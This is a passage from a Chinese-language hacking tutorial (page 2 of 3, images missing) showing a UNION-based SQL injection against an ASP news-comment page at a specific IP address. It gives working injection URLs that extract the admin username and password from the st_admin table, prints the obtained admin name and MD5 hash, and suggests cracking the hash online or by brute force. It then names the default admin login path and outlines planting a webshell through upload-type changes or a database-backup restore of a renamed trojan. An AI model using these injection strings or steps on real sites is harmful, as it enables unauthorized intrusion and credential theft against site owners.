我们打开刚才的评论测试地址 http://221.195.40.85/pinglun.asp?id=1&pltab=news，为了便于后面的比较，我这里先做一下截图，如下：


我们现在再在浏览器里提交：http://221.195.40.85/pinglun.asp?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12 from st_admin&pltab=news 查询语句，将会返回以下图片内容：

把这两次的返回页面做一下比较就可以一目了然了。再到数据库里我们看一下，5的地方代表的是st_news表的title字段，6是content字段，7是date字段。

看明白了这些之后，我们再次提交以下注入语句：http://221.195.40.85/pinglun.asp?id=1%20and%201=2%20union%20select%201,2,3,4,admin_name,admin_pass,id,8,9,10,11,12%20from%20st_admin&pltab=news继续进入注入（也就是分别把上一句话的5更换为了admin_name,6更换为了admin_pass，7更换为了id。再换句话说，就是st_admin表中的管理员ID，用户名，和密码了）。返回结果如下图所示：


大家看到什么了？对！我们已经得到了网站后台的管理员帐号是admin，密码是经过了md5加密的值6BB981871904F0B8123E259113AD429A。我们可以到http://www.cmd5.com进行尝试搜索，或者本地进行暴力破解跑出对方的密码来。接下来要做的就是登陆对方的后台管理系统了。这套系统的默认后台地址是 /admin/admin_login.asp 。把我们刚才得到的管理员帐号和密码输入，就可以登陆到后台了。如下图所示：

进入了后台得到Webshell就比较简单了。我们可以通过修改网站配置文件来修改上传文件类型，或者先传个改了后缀名的木马，然后利用数据库备份还原的方法还原出我们的木马来 。这里给大家大概演示一下前者。

上一页  [1] [2] [3] 下一页